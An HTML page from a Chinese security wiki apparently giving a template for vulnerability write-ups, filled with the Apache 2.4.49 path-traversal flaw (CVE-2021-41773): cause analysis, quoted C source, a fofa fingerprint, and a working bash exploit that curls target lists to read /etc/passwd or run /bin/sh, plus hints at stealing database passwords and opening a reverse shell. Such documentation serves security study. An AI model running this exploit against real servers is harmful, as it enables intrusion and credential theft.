
<!DOCTYPE HTML>
<html lang="zh-hans" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>漏洞文库模板 · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        <meta name="author" content="BitWiki支持团队">
        
        
    
    <link rel="stylesheet" href="../../gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-codeblock-filename/block.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-chapter-fold/chapter-fold.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-search-pro/search.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-splitter/splitter.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-insert-logo/plugin.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-back-to-top-button/plugin.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-advanced-emoji/emoji-website.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-anchor-navigation-ex/style/plugin.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-fontsettings/website.css">
                
            
                
                <link rel="stylesheet" href="../../gitbook/gitbook-plugin-theme-comscore/test.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../../gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="../../gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="../../漏洞文库/Apache/" />
    
    
    <link rel="prev" href="./" />
    

    <link href="https://wiki.1bit.win/doc/rss" title="BitWiki" rel="alternate" type="application/rss+xml" />

    <style>
    @media only screen and (max-width: 640px) {
        .book-header .hidden-mobile {
            display: none;
        }
    }
    </style>
    <script>
        window["gitbook-plugin-github-buttons"] = {"repo":"Bitwiki/bitwiki.github.io","types":["star","watch","fork"],"size":"small"};
    </script>

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="输入并搜索" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    
    
        
        <li>
            <a href="https://onebitsec.github.io/" target="_blank" class="custom-link">OneBit安全团队</a>
        </li>
    
        
        <li>
            <a href="https://github.com/BitWiki/bitwiki.github.io" target="_blank" class="custom-link">GitHub</a>
        </li>
    
    

    
    <li class="divider"></li>
    

    
        
        <li class="header">杂七杂八</li>
        
        
    
        <li class="chapter " data-level="1.1" data-path="../../">
            
                <a href="../../">
            
                    
                    Introduction
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2" data-path="../工具推荐/">
            
                <a href="../工具推荐/">
            
                    
                    工具推荐
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.2.1" data-path="../工具推荐/信息收集.html">
            
                <a href="../工具推荐/信息收集.html">
            
                    
                    信息收集
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.3" data-path="./">
            
                <a href="./">
            
                    
                    提交模板
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter active" data-level="1.3.1" data-path="漏洞文库模板.html">
            
                <a href="漏洞文库模板.html">
            
                    
                    漏洞文库模板
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    
        
        <li class="header">漏洞文库</li>
        
        
    
        <li class="chapter " data-level="2.1" data-path="../../漏洞文库/Apache/">
            
                <a href="../../漏洞文库/Apache/">
            
                    
                    Apache
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.1.1" data-path="../../漏洞文库/Apache/Log4j2/">
            
                <a href="../../漏洞文库/Apache/Log4j2/">
            
                    
                    Log4j2
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.1.1.1" data-path="../../漏洞文库/Apache/Log4j2/CVE-2021-44428  log4j2  2.14.x 存在JNDI RCE漏洞.html">
            
                <a href="../../漏洞文库/Apache/Log4j2/CVE-2021-44428  log4j2  2.14.x 存在JNDI RCE漏洞.html">
            
                    
                    CVE 2021 44428  Log4j2  2.14.X 存在JNDI RCE漏洞
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="2.1.2" data-path="../../漏洞文库/Apache/TomCat/">
            
                <a href="../../漏洞文库/Apache/TomCat/">
            
                    
                    TomCat
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.1.2.1" data-path="../../漏洞文库/Apache/TomCat/CVE-2017-12615 Tomcat  存在PUT请求文件上传漏洞.html">
            
                <a href="../../漏洞文库/Apache/TomCat/CVE-2017-12615 Tomcat  存在PUT请求文件上传漏洞.html">
            
                    
                    CVE 2017 12615 Tomcat  存在PUT请求文件上传漏洞
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.1.2.2" data-path="../../漏洞文库/Apache/TomCat/CVE-2020-1938 Tomcat  存在AJP 文件包含漏洞.html">
            
                <a href="../../漏洞文库/Apache/TomCat/CVE-2020-1938 Tomcat  存在AJP 文件包含漏洞.html">
            
                    
                    CVE 2020 1938 Tomcat  存在AJP 文件包含漏洞
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="2.1.2.3" data-path="../../漏洞文库/Apache/TomCat/Tomcat 管理后台弱口令导致的文件上传GetShell.html">
            
                <a href="../../漏洞文库/Apache/TomCat/Tomcat 管理后台弱口令导致的文件上传GetShell.html">
            
                    
                    Tomcat 管理后台弱口令导致的文件上传GetShell
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="2.2" data-path="../../漏洞文库/SonarQube/">
            
                <a href="../../漏洞文库/SonarQube/">
            
                    
                    SonarQube
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="2.2.1" data-path="../../漏洞文库/SonarQube/CVE-2020-27986 SonarQube 小于 8.4.2.x 存在API未授权访问漏洞.html">
            
                <a href="../../漏洞文库/SonarQube/CVE-2020-27986 SonarQube 小于 8.4.2.x 存在API未授权访问漏洞.html">
            
                    
                    CVE 2020 27986 SonarQube 小于 8.4.2.X 存在API未授权访问漏洞
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    
        
        <li class="header">知识文库</li>
        
        
    

    
        
        <li class="header">赏金猎人</li>
        
        
    
        <li class="chapter " data-level="4.1" >
            
                <span>
            
                    
                    BugBountyTip
            
                </span>
            

            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            本书使用 GitBook 发布
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="../.." >漏洞文库模板</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <div id="anchor-navigation-ex-navbar"><i class="fa fa-navicon"></i><ul><li><span class="title-icon "></span><a href="#cve-xxx-xxx-xxx--xx--252-&#x5B58;&#x5728;xxx&#x6F0F;&#x6D1E;"><b></b>CVE-xxx-xxx-xxx | xx &gt;= 2.5.2 &#x5B58;&#x5728;xxx&#x6F0F;&#x6D1E;</a></li><ul><li><span class="title-icon "></span><a href="#0x00-&#x6F0F;&#x6D1E;&#x8BF4;&#x660E;"><b></b>0x00 &#x6F0F;&#x6D1E;&#x8BF4;&#x660E;</a></li><li><span class="title-icon "></span><a href="#0x01-&#x5F71;&#x54CD;&#x7248;&#x672C;"><b></b>0x01 &#x5F71;&#x54CD;&#x7248;&#x672C;</a></li><li><span class="title-icon "></span><a href="#0x02-&#x6F0F;&#x6D1E;&#x6210;&#x56E0;"><b></b>0x02 &#x6F0F;&#x6D1E;&#x6210;&#x56E0;</a></li><li><span class="title-icon "></span><a href="#0x03-&#x6F0F;&#x6D1E;&#x4EE3;&#x7801;"><b></b>0x03 &#x6F0F;&#x6D1E;&#x4EE3;&#x7801;</a></li><li><span class="title-icon "></span><a href="#0x04-&#x8BE6;&#x7EC6;&#x5206;&#x6790;"><b></b>0x04 &#x8BE6;&#x7EC6;&#x5206;&#x6790;</a></li><li><span class="title-icon "></span><a href="#0x05-&#x6F0F;&#x6D1E;&#x6307;&#x7EB9;"><b></b>0x05 &#x6F0F;&#x6D1E;&#x6307;&#x7EB9;</a></li><li><span class="title-icon "></span><a href="#0x06-poc--exp"><b></b>0x06 POC &amp; EXP</a></li><li><span class="title-icon "></span><a href="#0x07-&#x8FDB;&#x9636;&#x5229;&#x7528;&#x601D;&#x8DEF;"><b></b>0x07 &#x8FDB;&#x9636;&#x5229;&#x7528;&#x601D;&#x8DEF;</a></li><li><span class="title-icon "></span><a href="#0x08-&#x5197;&#x4F59;&#x9879;"><b></b>0x08 &#x5197;&#x4F59;&#x9879;</a></li><li><span class="title-icon "></span><a href="#0x09-&#x6269;&#x5C55;&#x94FE;&#x63A5;"><b></b>0x09 &#x6269;&#x5C55;&#x94FE;&#x63A5;</a></li><li><span class="title-icon "></span><a href="#0x10-&#x8054;&#x7CFB;&#x65B9;&#x5F0F;"><b></b>0x10 &#x8054;&#x7CFB;&#x65B9;&#x5F0F;</a></li></ul></ul></div><a href="#cve-xxx-xxx-xxx--xx--252-&#x5B58;&#x5728;xxx&#x6F0F;&#x6D1E;" id="anchorNavigationExGoTop"><i class="fa fa-arrow-up"></i></a><h1 id="cve-xxx-xxx-xxx--xx--252-&#x5B58;&#x5728;xxx&#x6F0F;&#x6D1E;"><a name="cve-xxx-xxx-xxx--xx--252-&#x5B58;&#x5728;xxx&#x6F0F;&#x6D1E;" class="anchor-navigation-ex-anchor" href="#cve-xxx-xxx-xxx--xx--252-&#x5B58;&#x5728;xxx&#x6F0F;&#x6D1E;"><i class="fa fa-link" aria-hidden="true"></i></a>CVE-xxx-xxx-xxx | xx &gt;= 2.5.2 &#x5B58;&#x5728;xxx&#x6F0F;&#x6D1E;</h1>
<blockquote>
<p>&#x6807;&#x9898; &#x683C;&#x5F0F;&#x4E3A;:CVE&#x7F16;&#x53F7; |  &#x7248;&#x672C;&#x7B80;&#x8FF0;&#x3001;&#x6F0F;&#x6D1E;&#x7C7B;&#x578B;</p>
</blockquote>
<h2 id="0x00-&#x6F0F;&#x6D1E;&#x8BF4;&#x660E;"><a name="0x00-&#x6F0F;&#x6D1E;&#x8BF4;&#x660E;" class="anchor-navigation-ex-anchor" href="#0x00-&#x6F0F;&#x6D1E;&#x8BF4;&#x660E;"><i class="fa fa-link" aria-hidden="true"></i></a>0x00 &#x6F0F;&#x6D1E;&#x8BF4;&#x660E;</h2>
<blockquote>
<p>&#x6B64;&#x6BB5;&#x843D;&#x7B80;&#x5355;&#x660E;&#x786E;&#x7684;&#x63CF;&#x5199;&#x6F0F;&#x6D1E;&#x4EA7;&#x751F;&#x7684;&#x5F71;&#x54CD;</p>
</blockquote>
<p>&#x5728;Apache HTTP Server x.x.x.x &#x4E2D;&#x5BF9;&#x8DEF;&#x5F84;&#x89C4;&#x8303;&#x5316;&#x6240;&#x505A;&#x7684;&#x66F4;&#x6539;&#x4E2D;&#x53D1;&#x73B0;&#x4E86;&#x4E00;&#x4E2A;&#x7F3A;&#x9677;&#x3002;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x8DEF;&#x5F84;&#x904D;&#x5386;&#x653B;&#x51FB;&#x7A7F;&#x8D8A;&#x5230;&#x670D;&#x52A1;&#x5668;&#x76EE;&#x5F55;&#x4EE5;&#x5916;&#x3002;&#x5728;&#x5F00;&#x542F;CGI&#x914D;&#x7F6E;&#x540E;&#xFF0C;&#x5C06;&#x4F1A;&#x4ECE;&#x76EE;&#x5F55;&#x7A7F;&#x8D8A; / &#x4FE1;&#x606F;&#x6CC4;&#x9732;&#x5347;&#x7EA7;&#x4E3A;RCE&#x3002;</p>
<h2 id="0x01-&#x5F71;&#x54CD;&#x7248;&#x672C;"><a name="0x01-&#x5F71;&#x54CD;&#x7248;&#x672C;" class="anchor-navigation-ex-anchor" href="#0x01-&#x5F71;&#x54CD;&#x7248;&#x672C;"><i class="fa fa-link" aria-hidden="true"></i></a>0x01 &#x5F71;&#x54CD;&#x7248;&#x672C;</h2>
<blockquote>
<p>&#x6B64;&#x6BB5;&#x843D;&#x63CF;&#x5199;&#x53D7;&#x6F0F;&#x6D1E;&#x5F71;&#x54CD;&#x7684;&#x8F6F;&#x4EF6;&#x7248;&#x672C;</p>
</blockquote>
<ul>
<li>== Apache HTTP Server x.x.x.x</li>
<li>&lt;= Apache HTTP Server x.x.x.x</li>
</ul>
<h2 id="0x02-&#x6F0F;&#x6D1E;&#x6210;&#x56E0;"><a name="0x02-&#x6F0F;&#x6D1E;&#x6210;&#x56E0;" class="anchor-navigation-ex-anchor" href="#0x02-&#x6F0F;&#x6D1E;&#x6210;&#x56E0;"><i class="fa fa-link" aria-hidden="true"></i></a>0x02 &#x6F0F;&#x6D1E;&#x6210;&#x56E0;</h2>
<blockquote>
<p>&#x6B64;&#x6BB5;&#x843D;&#x7B80;&#x660E;&#x63CF;&#x5199;&#x6F0F;&#x6D1E;&#x662F;&#x7531;&#x4EC0;&#x4E48;&#x539F;&#x56E0;&#x9020;&#x6210;&#x7684;&#xFF0C;&#x662F;&#x54EA;&#x4E2A;&#x51FD;&#x6570;&#x5F15;&#x53D1;&#x7684;&#x6F0F;&#x6D1E;&#x7B49;</p>
</blockquote>
<ol>
<li>&#x7531;&#x4E8E;&#x5728;Apache HTTP Server x.x.x&#x5347;&#x7EA7;&#x5230; Apache HTTP Server x.x.x&#x65F6;&#xFF0C;&#x5BF9;&#x8DEF;&#x5F84;&#x89C4;&#x8303;&#x5316;&#x6240;&#x505A;&#x7684;&#x66F4;&#x6539;&#x4E2D;&#x51FA;&#x73B0;&#x6F0F;&#x6D1E;&#xFF0C;&#x8BE5;&#x6F0F;&#x6D1E;&#x662F;&#x7531;&#x4E8E; <strong><em>server/util.c\</em></strong> &#x4E2D;&#x7684; <strong><em>ap_normalize_path\</em></strong> &#x51FD;&#x6570; &#x4E00;&#x6B21;&#x89E3;&#x6790;&#x4E00;&#x4E2A; Unicode &#x503C;&#x5E76;&#x5728;&#x6240;&#x6709;&#x5B57;&#x7B26;&#x90FD;&#x88AB;&#x89E3;&#x7801;&#x4E4B;&#x524D;&#x5C1D;&#x8BD5;&#x68C0;&#x6D4B;&#x904D;&#x5386;&#x903B;&#x8F91;&#x5BFC;&#x81F4;&#x7684;&#x3002;</li>
<li><p>&#x5F53;&#x653B;&#x51FB;&#x8005;&#x5728; URL &#x4E2D;&#x4F7F;&#x7528;  <strong><em>/.%2e/\</em></strong>  &#x65F6;&#xFF0C;&#x7B2C; 572 &#x884C;&#x7684;&#x903B;&#x8F91;&#x4E0D;&#x4F1A;&#x5C06; <strong><em>%2e\</em></strong>  &#x8BC6;&#x522B;&#x4E3A;&#x53E5;&#x53F7;&#xFF0C;&#x6B64;&#x65F6;&#x8BE5;&#x5B57;&#x7B26;&#x5C1A;&#x672A;&#x88AB;&#x89E3;&#x7801;&#x3002;&#x4F46;&#x8BE5;&#x7248;&#x672C;Apache HTTP Servers&#x5E76;&#x6CA1;&#x6709;&#x5728;&#x8FD9;&#x79CD;&#x60C5;&#x51B5;&#x4E0B;&#x5C06;&#x6574;&#x4F53;URL&#x8FDB;&#x884C;&#x89E3;&#x7801;&#x5E76;&#x5339;&#x914D;&#x76EE;&#x5F55;&#x7A7F;&#x8D8A;&#x8FC7;&#x6EE4;&#xFF0C;&#x5BFC;&#x81F4;  <strong>/.%2e/</strong>  &#x88AB; &#x76F4;&#x63A5;&#x4EE3;&#x5165;&#x4F20;&#x9012;&#xFF0C;&#x5BFC;&#x81F4;&#x76EE;&#x5F55;&#x7A7F;&#x8D8A;&#x3002; </p>
</li>
<li><p>&#x8BE5;&#x6F0F;&#x6D1E;&#x9ED8;&#x8BA4;&#x914D;&#x7F6E;&#x60C5;&#x51B5;&#x4E0B;&#x53EA;&#x5B58;&#x5728;&#x76EE;&#x5F55;&#x904D;&#x5386;&#xFF0C;&#x4F46;&#x5F00;&#x542F;&#x4E0D;&#x53D7;&#x9650;&#x5236;&#x7684; <strong><em>mod_cgi\</em></strong> &#x529F;&#x80FD;&#x5C06;&#x4F1A;&#x9020;&#x6210;RCE</p>
</li>
</ol>
<h2 id="0x03-&#x6F0F;&#x6D1E;&#x4EE3;&#x7801;"><a name="0x03-&#x6F0F;&#x6D1E;&#x4EE3;&#x7801;" class="anchor-navigation-ex-anchor" href="#0x03-&#x6F0F;&#x6D1E;&#x4EE3;&#x7801;"><i class="fa fa-link" aria-hidden="true"></i></a>0x03 &#x6F0F;&#x6D1E;&#x4EE3;&#x7801;</h2>
<blockquote>
<p>&#x6B64;&#x6BB5;&#x843D;&#x8D34;&#x51FA;&#x8BE5;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x6240;&#x5728;&#x7684;&#x4EE3;&#x7801;&#x5757;&#x4E0E;&#x6587;&#x4EF6;&#x76EE;&#x5F55;&#xFF0C;&#x7531;&#x4E8E;&#x672C;&#x6587;&#x5E93;&#x4F7F;&#x7528;&#x4E86;&#x63D2;&#x4EF6;&#xFF0C;&#x53EF;&#x4EE5;&#x5728;&#x4EE3;&#x7801;&#x5757;&#x4E0A;&#x65B9;&#x4F7F;&#x7528; <strong>!FILENAME &lt;&#x6587;&#x4EF6;&#x76EE;&#x5F55;&gt;</strong>   &#x7684;&#x683C;&#x5F0F;&#x64B0;&#x5199; &#xFF0C;&#x5C3D;&#x91CF;&#x4E0D;&#x4F7F;&#x7528;&#x56FE;&#x7247;&#xFF0C;&#x56FE;&#x7247;&#x6216;&#x4EE3;&#x7801;&#x5757;&#x4E0B;&#x65B9;&#x53EF;&#x4EE5;&#x7B80;&#x5355;&#x63CF;&#x8FF0;</p>
</blockquote>
<div><p class="code-filename">server/util.c</p></div>
<pre><code class="lang-c"><span class="hljs-meta"># server/util.c &#x7B2C; 561 &#x2013; 596 &#x884C;</span>

<span class="hljs-keyword">if</span> (path[l] == <span class="hljs-string">&apos;.&apos;</span>) {
    <span class="hljs-comment">/* Remove /./ segments */</span>
    <span class="hljs-keyword">if</span> (IS_SLASH_OR_NUL(path[l + <span class="hljs-number">1</span>])) {
        l++;
        <span class="hljs-keyword">if</span> (path[l]) {
            l++;
        }
        <span class="hljs-keyword">continue</span>;
    }

    <span class="hljs-comment">/* Remove /xx/../ segments */</span>
    <span class="hljs-keyword">if</span> (path[l + <span class="hljs-number">1</span>] == <span class="hljs-string">&apos;.&apos;</span> &amp;&amp; IS_SLASH_OR_NUL(path[l + <span class="hljs-number">2</span>])) {
        <span class="hljs-comment">/* Wind w back to remove the previous segment */</span>
        <span class="hljs-keyword">if</span> (w &gt; <span class="hljs-number">1</span>) {
            <span class="hljs-keyword">do</span> {
                w--;
            } <span class="hljs-keyword">while</span> (w &amp;&amp; !IS_SLASH(path[w - <span class="hljs-number">1</span>]));
        }
        <span class="hljs-keyword">else</span> {
            <span class="hljs-comment">/* Already at root, ignore and return a failure
             * if asked to.
             */</span>
            <span class="hljs-keyword">if</span> (flags &amp; AP_NORMALIZE_NOT_ABOVE_ROOT) {
                ret = <span class="hljs-number">0</span>;
            }
        }

        <span class="hljs-comment">/* Move l forward to the next segment */</span>
        l += <span class="hljs-number">2</span>;
        <span class="hljs-keyword">if</span> (path[l]) {
            l++;
        }
        <span class="hljs-keyword">continue</span>;
    }
}
</code></pre>
<h2 id="0x04-&#x8BE6;&#x7EC6;&#x5206;&#x6790;"><a name="0x04-&#x8BE6;&#x7EC6;&#x5206;&#x6790;" class="anchor-navigation-ex-anchor" href="#0x04-&#x8BE6;&#x7EC6;&#x5206;&#x6790;"><i class="fa fa-link" aria-hidden="true"></i></a>0x04 &#x8BE6;&#x7EC6;&#x5206;&#x6790;</h2>
<blockquote>
<p> &#x8BE5;&#x6BB5;&#x843D;&#x4E3B;&#x8981;&#x64B0;&#x5199;&#x8BE6;&#x7EC6;&#x5206;&#x6790;&#x6F0F;&#x6D1E;&#x5B58;&#x5728;&#x7684;&#x539F;&#x56E0;&#xFF0C;&#x4F8B;&#x5982;&#x4EC0;&#x4E48;&#x51FD;&#x6570;&#x5BFC;&#x81F4;&#x4E86;&#x4EC0;&#x4E48;</p>
</blockquote>
<p>&#x5F53;&#x653B;&#x51FB;&#x8005;&#x5728; URL &#x4E2D;&#x4F7F;&#x7528; <strong><em>/.%2e/\</em></strong> &#x65F6;&#xFF0C;&#x7B2C; 572 &#x884C;&#x7684;&#x903B;&#x8F91;&#x4E0D;&#x4F1A;&#x5C06; <strong><em>%2e\</em></strong> &#x8BC6;&#x522B;&#x4E3A;&#x53E5;&#x53F7;&#xFF0C;&#x6B64;&#x65F6;&#x8BE5;&#x5B57;&#x7B26;&#x5C1A;&#x672A;&#x88AB;&#x89E3;&#x7801;&#x3002;&#x4F46;&#x8BE5;&#x7248;&#x672C;Apache HTTP Servers&#x5E76;&#x6CA1;&#x6709;&#x5728;&#x8FD9;&#x79CD;&#x60C5;&#x51B5;&#x4E0B;&#x5C06;&#x6574;&#x4F53;URL&#x8FDB;&#x884C;&#x89E3;&#x7801;&#x5E76;&#x5339;&#x914D;&#x76EE;&#x5F55;&#x7A7F;&#x8D8A;&#x8FC7;&#x6EE4;&#xFF0C;&#x5BFC;&#x81F4; <strong>/.%2e/</strong> &#x88AB; &#x76F4;&#x63A5;&#x4EE3;&#x5165;&#x4F20;&#x9012;&#xFF0C;&#x5BFC;&#x81F4;&#x76EE;&#x5F55;&#x7A7F;&#x8D8A;&#xFF0C;&#x5177;&#x4F53;&#x5982;&#x4E0B;:</p>
<div><p class="code-filename">server/util.c</p></div>
<pre><code class="lang-c"><span class="hljs-comment">/* Remove /xx/../ segments */</span>
                <span class="hljs-keyword">if</span> (path[l + <span class="hljs-number">1</span>] == <span class="hljs-string">&apos;.&apos;</span> &amp;&amp; IS_SLASH_OR_NUL(path[l + <span class="hljs-number">2</span>]))
<span class="hljs-meta">#&#x4E0A;&#x9762;&#x7684;&#x4EE3;&#x7801;&#x9519;&#x8BEF;&#x5224;&#x65AD;&#x4E86;&#x76EE;&#x5F55;&#x7A7F;&#x8D8A;&#x7684;payload&#xFF0C;&amp;&amp; &#x5224;&#x65AD;&#x53EA;&#x6709;&#x5728;&#x76EE;&#x5F55;.&#x7684;&#x540E;&#x9762;&#x8DDF;&#x7684;&#x662F;/&#x6216;&#x8005;&#x7A7A;&#x7684;&#x65F6;&#x5019;&#x624D;&#x4F1A;&#x89E6;&#x53D1;&#x6B21;&#x89C4;&#x5219;&#xFF0C;&#x5E76;&#x4E14;&#x6CA1;&#x6709;&#x89E3;URL&#x7F16;&#x7801;&#x7684;%2e&#x4F20;&#x5165;&#x540E;&#x5E76;&#x4E0D;&#x4F1A;&#x5BF9;%2e&#x89E3;&#x7801;&#x8FDB;&#x884C;&#x56DE;&#x6EAF;&#x9A8C;&#x8BC1;&#xFF0C;&#x4E5F;&#x4E0D;&#x4F1A;&#x5BF9;&#x6574;&#x4F53;URL&#x8FDB;&#x884C;&#x89E3;&#x7801;&#x5339;&#x914D;&#xFF0C;&#x800C;&#x662F;&#x53EA;&#x8BC6;&#x522B;&#x4E86;%,2,e                    </span>


<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> IS_SLASH(s) (s == <span class="hljs-string">&apos;/&apos;</span>)</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> IS_SLASH_OR_NUL(s) (s == <span class="hljs-string">&apos;\0&apos;</span> || IS_SLASH(s))</span>
</code></pre>
<h2 id="0x05-&#x6F0F;&#x6D1E;&#x6307;&#x7EB9;"><a name="0x05-&#x6F0F;&#x6D1E;&#x6307;&#x7EB9;" class="anchor-navigation-ex-anchor" href="#0x05-&#x6F0F;&#x6D1E;&#x6307;&#x7EB9;"><i class="fa fa-link" aria-hidden="true"></i></a>0x05 &#x6F0F;&#x6D1E;&#x6307;&#x7EB9;</h2>
<blockquote>
<p>&#x8BE5;&#x6BB5;&#x843D;&#x4E3B;&#x8981;&#x7528;&#x4E8E;&#x63CF;&#x5199;&#x6F0F;&#x6D1E;&#x6307;&#x7EB9;&#x6216;&#x8005;&#x7279;&#x5F81;&#x622A;&#x56FE;,&#x53EF;&#x9009;</p>
</blockquote>
<p>fofa:</p>
<pre><code>title=&quot;apache&quot;
</code></pre><h2 id="0x06-poc--exp"><a name="0x06-poc--exp" class="anchor-navigation-ex-anchor" href="#0x06-poc--exp"><i class="fa fa-link" aria-hidden="true"></i></a>0x06 POC &amp; EXP</h2>
<blockquote>
<p>&#x4E3B;&#x8981;&#x5B58;&#x653E;&#x4E00;&#x4E9B;&#x7528;&#x4E8E;&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;EXP &amp; POC&#xFF0C;&#x53EF;&#x4EE5;&#x662F;&#x6F0F;&#x6D1E;&#x590D;&#x73B0;&#xFF0C;&#x4F46;&#x8981;&#x6C42;&#x5C3D;&#x91CF;&#x5C11;&#x7528;&#x56FE;&#x7247;&#x7684;&#x65B9;&#x5F0F;&#xFF0C;&#x7CBE;&#x7B80;&#x5185;&#x5BB9;&#xFF0C;&#x6BD4;&#x5982;&#x622A;&#x56FE;&#x6F0F;&#x6D1E;&#x70B9;&#xFF0C;&#x6587;&#x672C;&#x63CF;&#x8FF0;&#x6F0F;&#x6D1E;&#x590D;&#x73B0;&#x7ECF;&#x8FC7;&#xFF0C;&#x7C98;&#x8D34;burp&#x6570;&#x636E;&#x5305;&#x7B49;</p>
</blockquote>
<div><p class="code-filename">exp.sh</p></div>
<pre><code class="lang-bash"><span class="hljs-comment"># Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal</span>
<span class="hljs-comment"># Date: 10/05/2021</span>
<span class="hljs-comment"># Exploit Author: Lucas Souza https://lsass.io</span>
<span class="hljs-comment"># Vendor Homepage:  https://apache.org/</span>
<span class="hljs-comment"># Version: 2.4.49</span>
<span class="hljs-comment"># Tested on: 2.4.49</span>
<span class="hljs-comment"># CVE : CVE-2021-41773</span>
<span class="hljs-comment"># Credits: Ash Daulton and the cPanel Security Team</span>

<span class="hljs-meta">#!/bin/bash
</span>
<span class="hljs-keyword">if</span> [[ <span class="hljs-variable">$1</span> =3D=3D <span class="hljs-string">&apos;&apos;</span> ]]; [[ <span class="hljs-variable">$2</span> =3D=3D <span class="hljs-string">&apos;&apos;</span> ]]; <span class="hljs-keyword">then</span>
<span class="hljs-built_in">echo</span> Set [TAGET-LIST.TXT] [PATH]
<span class="hljs-built_in">echo</span> ./PoC.sh targets.txt /etc/passwd
<span class="hljs-built_in">exit</span>
<span class="hljs-keyword">fi</span>
<span class="hljs-keyword">for</span> host <span class="hljs-keyword">in</span> $(cat <span class="hljs-variable">$1</span>); <span class="hljs-keyword">do</span>
curl --silent --path-as-is --insecure <span class="hljs-string">&quot;<span class="hljs-variable">$host</span>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e<span class="hljs-variable">$2</span>&quot;</span>; <span class="hljs-keyword">done</span>

<span class="hljs-comment"># PoC.sh targets.txt /etc/passwd</span>
<span class="hljs-comment"># PoC.sh targets.txt /bin/sh whoami</span>
</code></pre>
<h2 id="0x07-&#x8FDB;&#x9636;&#x5229;&#x7528;&#x601D;&#x8DEF;"><a name="0x07-&#x8FDB;&#x9636;&#x5229;&#x7528;&#x601D;&#x8DEF;" class="anchor-navigation-ex-anchor" href="#0x07-&#x8FDB;&#x9636;&#x5229;&#x7528;&#x601D;&#x8DEF;"><i class="fa fa-link" aria-hidden="true"></i></a>0x07 &#x8FDB;&#x9636;&#x5229;&#x7528;&#x601D;&#x8DEF;</h2>
<blockquote>
<p>&#x8BE5;&#x6BB5;&#x843D;&#x63CF;&#x5199;&#x4E00;&#x4E9B;&#x81EA;&#x6211;&#x7406;&#x89E3;&#x548C;&#x5B9E;&#x6218;&#x73AF;&#x5883;&#x4E2D;&#x7684;&#x8FDB;&#x9636;&#x5229;&#x7528;&#x601D;&#x8DEF;</p>
</blockquote>
<ul>
<li>&#x5728;&#x7279;&#x6B8A;&#x60C5;&#x51B5;&#x4E0B;&#x53EF;&#x5BF9;&#x7F51;&#x9875;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x8FDB;&#x884C;&#x8BFB;&#x53D6;&#xFF0C;&#x53D1;&#x73B0;&#x6570;&#x636E;&#x5E93;&#x8FDE;&#x63A5;&#x5BC6;&#x7801;&#x7B49;&#x94ED;&#x611F;&#x4FE1;&#x606F;</li>
<li>&#x53EF;&#x4F7F;&#x7528;bash&#x76F4;&#x63A5;&#x53CD;&#x5F39;shell</li>
</ul>
